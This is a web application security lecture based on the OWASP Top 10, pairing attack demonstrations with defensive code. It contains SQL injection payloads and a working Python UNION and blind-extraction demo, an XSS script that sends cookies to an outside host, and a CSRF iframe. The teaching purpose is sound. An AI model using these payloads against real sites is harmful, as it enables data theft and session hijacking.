Information Security Gabriel Lawrence Director, IT Security UCSD
Director of IT Security, UCSD
Three startups (2 still around!)
Sun Microsystems (Consulting and Java Software)
Secure Internet Applications
Don't go to jail! Some of the things I'm going to talk about are OK against your own applications... but would be a crime against someone else's.
Internet security is new... no, really. ARPANET's first two nodes went up in 1969; modern infosec didn't roll around until 1988.
First major worm: Morris Worm, 1988
First web server worm: Code Red, 2001
First web app worm: Asprox, May 2008
Network security: 1988-2008
Web security (browser and web apps): 2008-
Asprox attacked any web app it could reach using SQL injection.
What is information security? Why do we care?
Protecting assets from risk using people, process and technology.
SDLC
Requirements, Architecture/Design, Coding, Integration Testing, Deployment, Long Term Support
Agile development has smaller cycles, but software development generally passes through these major phases:
* Requirements: what you are going to build
* Architecture/Design: how
* Coding: doing it
* Integration Testing: making sure the overall build works
* Deployment: shipping it
* Long Term Support: you can never really be done!
Where was security again? I know... this guy is supposed to be a security guy and he didn't show it on the SDLC slide... What's up with that?
Security is part of every step in the SDLC
Requirements concretely define security expectations
* Data definition, handling, storage
* Auth^2 (authentication and authorization)
* Logging
Threat modeling may be a tool to use here, depending on how sensitive the application is, how large the development team is, and how formal the methodology is. It can straddle the Requirements and Architecture/Design effort. http://www.owasp.org/index.php/threat_risk_modeling
1. Identify security objectives: Auth^2, how much risk will you take? Reputation? Privacy and regulatory compliance? Availability?
2. Analyze the requirements/app design for components, data flows and trust boundaries
3. Decompose the app into features and modules and identify the ones where security matters
4. Identify threats
5. Decide what you do about them; there are different mechanisms to accomplish this...
Architecture/Design should identify security characteristics and critical security features
Examples:
* User IDs for database access: a normal user ID for everyday queries and a separate, more privileged one reserved for sensitive operations
* Identify trusted communication paths and trust boundaries
* Identify how auth^2 is accomplished and where: universal enforcement, not page by page
Use secure coding practices
Security and quality are often the same thing.
How does your software deal with expected and unexpected inputs?
Unit tests should test good and BAD inputs.
Threat models?
CODE REVIEWS!
Integration testing is a good point to test the big picture
Quality: does it do what it's supposed to? Does it do other things it's not supposed to?
Automated tools: application scanners
Hand testing: be evil
Deployment: traditional InfoSec
Security around the database user IDs? N-tier or 1-tier? Firewalls? OS hardening? Log management? Patch management? Fault tolerance? Configurations? Vulnerability scanning?
Don't forget about your application
Component updates? New threats? New attacks?
Biggest risk here!
What does it mean to be evil?
Developers and traditional IT tend to think about: Does the feature work? Is the system up? Does it do what the user wants?
Attackers come at it from a different direction: What happens when I give it bad input? How does it fail? What can I do while it's failing? What else can I make this system do?
Abusing trust.
OWASP and the Top 10
Open Web Application Security Project: owasp.org
Top 10: the top 10 risks, not the top 10 weaknesses
A1 - Injection
SQL, OS/command, LDAP
Untrusted data is sent to an interpreter as part of a command or query. The interpreter gets confused about what's data and what's code, and executes some of the hostile data.
```java
...
String[] unamearr = request.getParameterValues("uname"); // elided on the slide; parameter name assumed
String[] pwordarr = request.getParameterValues("pword");
if (unamearr.length == 1 && pwordarr.length == 1) {
    // Vulnerable on purpose: the username is concatenated straight into the SQL text
    res = stm.executeQuery("SELECT * FROM users WHERE username = '" + unamearr[0] + "'");
}
...
```
SELECT
Used to select data from a table. Syntax:
SELECT [ALL | DISTINCT] columnname1 [, columnname2]
FROM tablename1 [, tablename2]
[WHERE condition [AND | OR condition ...]]
[GROUP BY column-list]
[HAVING conditions]
[ORDER BY column-list [ASC | DESC]]
SELECT uname, password FROM users
SELECT uname, password FROM users WHERE uname = 'gabe'
SQL comments: stuff the database ignores
SELECT uname, password FROM users WHERE uname = 'gabe' -- this is a comment...
"SELECT * FROM users WHERE username = '"+unamearr[0]+"'"
unamearr[0] = gabe
SELECT * FROM users WHERE username = 'gabe'

unamearr[0] = '
SELECT * FROM users WHERE username = '''
Exception! The lone quote leaves the string literal unterminated, which is the first sign that input reaches the SQL parser.
UNION
Puts the results of two selects together (both must return the same number of columns):
SELECT [ALL | DISTINCT] columnname1 [, columnname2]
FROM tablename1 [, tablename2]
[WHERE condition [AND | OR condition ...]]
UNION
SELECT [ALL | DISTINCT] columnname1 [, columnname2]
FROM tablename1 [, tablename2]
[WHERE condition [AND | OR condition ...]]
unamearr[0] = ' UNION SELECT 'gabe', 'pass' --
SELECT * FROM users WHERE username = '' UNION SELECT 'gabe', 'pass' -- '
The attacker's chosen row comes back as if it were a real user (the number of columns in the UNION must match what SELECT * returns), and the comment swallows the quote the application appends.

Stacked queries (where the driver lets one call run more than one statement):
unamearr[0] = '; INSERT INTO users (username, password) VALUES ('badguy', 'pass'); --
Error Based SQL Injection
unamearr[0] = ' UNION SELECT CAST(version() AS int), pass --
ERROR: invalid input syntax for integer: "PostgreSQL 8.3.7 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Ubuntu 4.3.3-5ubuntu4) 4.3.3"
You get an actual error message back... so make useful information appear in the error message (here, by forcing a failed cast of the value you want to read).
NOISY, EASY
Blind SQL Injection
unamearr[0] = '; SELECT pg_sleep(10) WHERE EXISTS (SELECT table_name FROM information_schema.tables WHERE substr(table_name,1,1)='p') --
The error is handled by the app, but the SQL is still run. Here the signal is time: the response is delayed 10 seconds only if the answer is yes.
Ask a series of yes/no questions: is there a table whose name begins with A? With B? ...
Long and painful... so write a program :-)
http://sqlmap.sourceforge.net/ http://michaeldaw.org/sql-injection-cheatsheet http://sla.ckers.org/forum/
Defenses
* Parameterized queries
* Stored procedures (but beware ones that build dynamic SQL with EXEC/eval: that just moves the injection into the database)
* Escape special characters (OWASP ESAPI)
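The attacks and the parameterized fix above, as an added example that is not code from the slides. It runs against an in-memory SQLite database (so PostgreSQL's pg_sleep and information_schema are replaced by a boolean signal and sqlite_master); the sample tables, rows and the payroll table are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample data: a users table like the one on the slides, plus a
    second table the attacker does not know about yet."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('gabe', 's3cret'), ('alice', 'hunter2');
        CREATE TABLE payroll (employee TEXT, salary INTEGER);
        INSERT INTO payroll VALUES ('gabe', 123456);
    """)
    return db


def lookup_vulnerable(db, uname):
    """The slide's pattern: untrusted input concatenated into the query text, so
    the SQL parser cannot tell the attacker's data from the developer's code."""
    sql = "SELECT * FROM users WHERE username = '" + uname + "'"
    return db.execute(sql).fetchall()


def lookup_safe(db, uname):
    """Parameterized query: the value travels separately from the SQL text and is
    only ever treated as a string, never parsed as SQL."""
    return db.execute("SELECT * FROM users WHERE username = ?", (uname,)).fetchall()


def lone_quote_breaks_query(db):
    """A single quote unbalances the string literal and the database raises a
    syntax error: the 'Exception!' on the slide."""
    try:
        lookup_vulnerable(db, "'")
        return False
    except sqlite3.OperationalError:
        return True


def union_attack(db):
    """UNION injection: glue a second SELECT onto the query so rows from another
    table come back through the login lookup. The column count must match the
    original SELECT (users has two columns); '-- ' comments out the trailing
    quote the application appends."""
    payload = "' UNION SELECT employee, salary FROM payroll -- "
    return lookup_vulnerable(db, payload)


ALPHABET = "abcdefghijklmnopqrstuvwxyz_0123456789"


def blind_extract_table_name(db, max_len=32):
    """Boolean-based blind injection: the app shows no error and nothing from the
    injected subquery, but the known row for 'gabe' either comes back or not,
    which answers one yes/no question per request: 'is character N of the
    first table name equal to X?'. sqlite_master plays the role of PostgreSQL's
    information_schema.tables on the slide."""
    name = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            payload = ("gabe' AND substr((SELECT name FROM sqlite_master "
                       "WHERE type='table' ORDER BY name LIMIT 1),%d,1)='%s' -- "
                       % (pos, ch))
            if lookup_vulnerable(db, payload):  # row came back: the answer is yes
                name += ch
                break
        else:
            return name  # no character matched: end of the name
    return name


if __name__ == "__main__":
    db = make_db()
    print("lone quote raises:", lone_quote_breaks_query(db))
    print("union attack:", union_attack(db))
    print("blind extraction:", blind_extract_table_name(db))
    print("same payload, parameterized:",
          lookup_safe(db, "' UNION SELECT employee, salary FROM payroll -- "))
```

The blind extraction needs one request per candidate character per position, which is exactly why the slide says to write a program; tools like sqlmap automate this and the error-based and time-based variants.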
A2 - Cross Site Scripting (XSS)
The app takes untrusted data and sends it to the browser without escaping it for the context it lands in:
* User data entered into a form
* Data injected into the database (see Asprox)
* Data from an external feed
Allows an attacker to modify web pages, steal data and redirect the web browser.
JavaScript
First shipped in a browser in December 1995.
Standardized as ECMAScript.
A prototype-based scripting language with syntax loosely based on C. The "Java" in JavaScript is marketing: although there is a link between Java and JavaScript, they are separate languages.
JavaScript in the browser
Most commonly used in web browsers for client-side scripting.
Also in PDF, Adobe Creative Suite, JDK 1.6, Dashboard Widgets on OS X, Adobe AIR.
Browsers come with standard objects: browser objects (window, document), HTML event handlers, the Document Object Model, XMLHttpRequest.
Document Object Model
Standard object model for HTML and XML documents, supported in all browsers.
Allows JavaScript to read and change the contents of web pages.
Defines an event model that allows JavaScript to interact with the user.
Communicating across the network
JavaScript can load images, submit forms, create iframes, use XmlHttpRequest... and other methods. Every one of these sends a request somewhere, so every one is a channel for carrying data off the page.
JavaScript Security Model
The browser has a security policy that governs what JavaScript can do.
The Same-Origin Policy prevents scripts loaded from one web site from interacting with a document loaded from a different site.
A script included from another site runs with the origin of the document that loaded it, not the origin of the host the script came from.
Same origin applies to accessing embedded documents (window, iframe, layer, ilayer).
Same origin doesn't prevent a script from loading a window, iframe, layer or ilayer from another site; it prevents reading or scripting their contents.
Poor Man's Page Defacement
document.location controls what content is in the current window.
What would happen if we put <script>document.location="http://www.cnn.com"</script> in a field that gets stored and shown to users of the site? Every visitor to that page gets bounced to cnn.com.
Stealing data
```html
<script>
var myimage = new Image();
myimage.src = "http://www.landq.org/" + document.cookie + "---" + document.location;
</script>
```
The image never has to render: the request for it carries the victim's cookie and current URL to the attacker's server log.
Output filtering
Different filtering for each output destination: what is safe inside HTML text is not safe inside a JavaScript string, a CSS value, or a JSON response. Encode for the context the data lands in: HTML, JavaScript, CSS, JSON.
But I want HTML formatting!
Use wiki markup; it's becoming standard.
Use HTML entities for odd characters.
Whitelist: define what tags are allowed, define what attributes are allowed, strip everything else.
Your code produces the markup, so you are in control.
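Both points above (context-specific output encoding, and a whitelist for the "I want HTML formatting" case) as one added example; this is not code from the slides or from OWASP ESAPI. The allowed tag and attribute sets are an assumption for the demo; the attack strings are constructed.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import quote, urlsplit


def encode_for_html(s):
    """For text between tags and inside double-quoted attribute values."""
    return html.escape(s, quote=True)


def encode_for_js_string(s):
    """For a value dropped inside a JavaScript string literal in a <script> block.
    json.dumps escapes quotes, backslashes and control characters; '</' is also
    escaped so the value can never contain '</script>' and end the block early,
    and the JS line terminators U+2028/U+2029 are escaped too."""
    out = json.dumps(s)
    return (out.replace("</", "<\\/")
               .replace("\u2028", "\\u2028").replace("\u2029", "\\u2029"))


def encode_for_url_param(s):
    """For a value placed in a query-string parameter."""
    return quote(s, safe="")


# Whitelist (assumed for the demo): allowed tags and, per tag, allowed attributes.
# Everything else is dropped; all text is entity-encoded by our own code.
ALLOWED = {"b": set(), "i": set(), "em": set(), "strong": set(), "p": set(), "a": {"href"}}


class WhitelistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities in input become text, then get re-encoded
        self.out = []
        self.open = []  # tags we emitted and still owe a close for

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # script, img, iframe, style... never reach the output
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue  # onclick, onerror, style and friends never survive
            if name == "href" and urlsplit(value).scheme not in ("http", "https"):
                continue  # blocks javascript:, data: and relative tricks
            kept.append(' %s="%s"' % (name, encode_for_html(value)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open:  # close only what we opened, keeping output well-formed
            while True:
                t = self.open.pop()
                self.out.append("</%s>" % t)
                if t == tag:
                    break

    def handle_data(self, data):
        self.out.append(encode_for_html(data))

    def close(self):
        super().close()
        while self.open:  # input left tags unclosed: close them ourselves
            self.out.append("</%s>" % self.open.pop())


def sanitize_html(untrusted):
    p = WhitelistSanitizer()
    p.feed(untrusted)
    p.close()
    return "".join(p.out)
```

Note the order of operations: the parser decodes entities first, so a "pre-encoded" payload such as `&lt;script&gt;` is treated as text and encoded again rather than passed through. The same idea applies to the encoders: choose by where the output lands, not by what the input looks like.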
A3 - Broken Authentication and Session Management
* Jump past the login page
* No security around assets such as images and video streams (for performance, or because a 3rd-party package serves them...)
* Data in session cookies: username? What happens if I change it?
* Application timeouts: the user walks away
* Does not use SSL/TLS for all traffic, just the login? Then the session cookie is stealable.
* Session ID in URLs: gets emailed to others... pwned.
* Watch out for XSS!
A4 - Insecure Direct Object References
Parameter tampering: http://www.example.com/view.jsp?itemid=10
What happens when the user changes itemid to 11? The app has to check that this requester may see this object, not just that someone is logged in.
A5 - Cross Site Request Forgery
<iframe src="http://yourbank/transfer.asp?from=checking&to=08809988&amount=1000000"></iframe>
The victim's browser attaches their bank session cookie to a request the attacker's page triggered.
Use a random hidden value, or nonce, in the form: there is then a secret parameter the malicious folks can't predict or know, because the JavaScript security model (same origin) keeps their page from reading it.
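The nonce defense above, as an added example (not code from the slides): a token derived from the session with a server-side key, checked in constant time on every state-changing request. It also shows the session-ID and cookie-flag points from the A3 and A10 slides: a random session ID and a Set-Cookie line with Secure and HttpOnly (SameSite=Lax is a newer, additional CSRF defense not on the slides). The bank form, parameter names and the transfer handler are hypothetical.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret; never sent to clients


def new_session_id():
    """256 bits from the OS CSPRNG: unguessable, unlike a counter or a username."""
    return secrets.token_urlsafe(32)


def csrf_token_for(session_id):
    """Token bound to the session: HMAC(server key, session id). The attacker's
    page cannot read it (same origin) and cannot compute it (no key)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def render_transfer_form(session_id):
    """Hypothetical bank form; the hidden field carries the token."""
    return ('<form method="POST" action="/transfer">'
            '<input type="hidden" name="csrf" value="%s">' % csrf_token_for(session_id) +
            '<input name="to"><input name="amount"><input type="submit"></form>')


def handle_transfer(session_id, form):
    """Server side. session_id comes from the cookie, form from the request body.
    Reject unless the submitted token matches the one derived from the session;
    compare_digest avoids leaking the token byte by byte through timing."""
    submitted = form.get("csrf", "")
    if not hmac.compare_digest(submitted, csrf_token_for(session_id)):
        return (403, "CSRF token missing or invalid")
    return (200, "transferred %s to %s" % (form["amount"], form["to"]))


def session_cookie_header(session_id):
    """Set-Cookie for the session: Secure (never sent over plain HTTP), HttpOnly
    (page script cannot read it, so XSS cannot simply exfiltrate it), SameSite=Lax
    (browser withholds it on cross-site POSTs and framed requests)."""
    return "Set-Cookie: sid=%s; Secure; HttpOnly; SameSite=Lax; Path=/" % session_id


def simulate_attack(session_id):
    """The slide's iframe: the browser sends the cookie, but the attacker's page
    could not include the token, so the request carries none."""
    return handle_transfer(session_id, {"from": "checking", "to": "08809988",
                                        "amount": "1000000"})
```

A token computed as an HMAC of the session ID needs no server-side storage; the price is that anyone who steals the session ID (see the XSS and A10 slides) also gets valid tokens, which is why the cookie flags matter as much as the nonce.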
A6 - Security Misconfiguration
Did you get the deployment step right? Did you remove all the testing code?
A7 - Failure To Restrict URL Access
Comcast example.
Is auth^2 properly applied to every URL, not just the ones linked from the menu?
Policies need to be flexible to adapt to business needs: role based, so you don't have to twiddle every user. Grant access for the proper business situation.
Default deny!
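The A4 and A7 points together, as an added example (not code from the slides): a role-based check that falls through to deny for any unknown role, action or object, and the view.jsp?itemid=10 lookup rewritten so that the object's owner is checked, not just whether a user is logged in. The items, roles and permission names are constructed for the demo.

```python
# Constructed sample data: who owns which item, and which roles may do what.
ITEMS = {10: {"owner": "gabe", "title": "gabe's invoice"},
         11: {"owner": "alice", "title": "alice's invoice"}}

# Role -> permitted actions. Anything not listed is denied: a new feature or
# URL is closed until some role is explicitly granted it.
ROLE_PERMISSIONS = {
    "user":  {"view_own_item"},
    "admin": {"view_own_item", "view_any_item", "delete_item"},
}


class Forbidden(Exception):
    pass


def permitted(user, action):
    """Role-based check with default deny: an unknown role yields an empty set
    and an unknown action is in no set, so both answer False."""
    return any(action in ROLE_PERMISSIONS.get(role, set())
               for role in user.get("roles", ()))


def view_item(user, item_id):
    """The slide's /view.jsp?itemid=10: the id is untrusted, so fetch the object
    and decide whether this requester may see this object."""
    item = ITEMS.get(item_id)
    if item is None:
        raise Forbidden("no such item")  # same answer as 'not yours': don't reveal which ids exist
    if permitted(user, "view_any_item"):
        return item
    if permitted(user, "view_own_item") and item["owner"] == user["name"]:
        return item
    raise Forbidden("not permitted")


def handle_view(user, raw_item_id):
    """Front door for the URL: parse the parameter, then enforce. Returns (status, body)."""
    try:
        item_id = int(raw_item_id)
    except (TypeError, ValueError):
        return (400, "bad itemid")
    try:
        return (200, view_item(user, item_id)["title"])
    except Forbidden:
        return (403, "forbidden")
```

Doing the check inside view_item rather than in the URL handler is what "universal enforcement" from the design slide means in practice: every path to the object, including a second URL added later, goes through the same decision.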
A8 - Unvalidated Redirects and Forwards
A user-controlled parameter in the URL supplies the redirect target: the link looks like your site, but sends you to evil.com.
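A redirect-target check, as an added example (not code from the slides). The allow-listed host name is an assumption; the point is the set of inputs that look harmless and are not: protocol-relative `//evil.com`, backslashes that browsers treat as slashes, `user@host` tricks and non-http schemes. Anything that fails falls back to a fixed default rather than being "cleaned".

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.example.com"}  # assumed: this site's own host names


def safe_redirect_target(next_param, default="/"):
    """Return a URL it is safe to send the browser to: a path on this site, or an
    absolute http(s) URL whose host is on the allow-list. Everything else
    becomes the default."""
    if not next_param:
        return default
    target = next_param.strip().replace("\\", "/")  # browsers treat '\' as '/'
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative path. '//evil.com' is protocol-relative and would leave the
        # site, so require exactly one leading slash.
        if target.startswith("/") and not target.startswith("//"):
            return target
        return default
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return target
    return default
```

The same rule applies to server-side forwards: a parameter that names the next page must be matched against what the application is willing to forward to, not merely checked for "looks like a path".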
A9 - Insecure Cryptographic Storage
The right cryptographic algorithm? Key management? Data at rest?
Using a valid cert (sort of a configuration issue...)
A10 - Insufficient Transport Layer Protection
Session cookies have the secure flag set.
Legitimate server cert.
Require SSL... don't let them land on the non-SSL site.
Backend communication???
Error Page Handling
Set up a global error handler.
Control the information leaked out (the error-based SQL injection earlier only worked because the database's message reached the browser).
Gives you the ability to do additional logging and notification.
Done globally, it ensures the handling is applied consistently.
Not by itself enough to protect you from the underlying problems.
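A global error boundary of the kind described above, as an added example (not code from the slides): every unhandled exception becomes the same generic response carrying only a correlation ID, while the full detail goes to the log and to an optional notifier. The handler interface and the sample failing handler are constructed for the demo.

```python
import logging
import traceback
import uuid

log = logging.getLogger("app")


def run_request(handler, *args, notify=None):
    """Wrap every request handler. Returns (status, body). On failure the client
    sees a fixed message plus an incident id; the exception text and traceback
    (which may carry SQL, paths, versions or stack frames) go only to the log,
    and to notify(incident_id, exc) if a notifier is configured."""
    try:
        return (200, handler(*args))
    except Exception as exc:  # deliberately broad: this is the last line of defense
        incident = uuid.uuid4().hex[:12]
        log.error("incident %s: %r\n%s", incident, exc, traceback.format_exc())
        if notify is not None:
            notify(incident, exc)
        return (500, "Something went wrong. Reference: %s" % incident)


def failing_lookup(uname):
    """Constructed handler that fails the way the error-based injection slide shows."""
    raise ValueError('invalid input syntax for integer: "PostgreSQL 8.3.7 on i486-pc-linux-gnu"')


def working_lookup(uname):
    return "hello " + uname
```

The incident ID is what support and the logs have in common: the user can quote it, the log line has the detail, and the page never shows the database's own words.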
Check out owasp.org
Questions?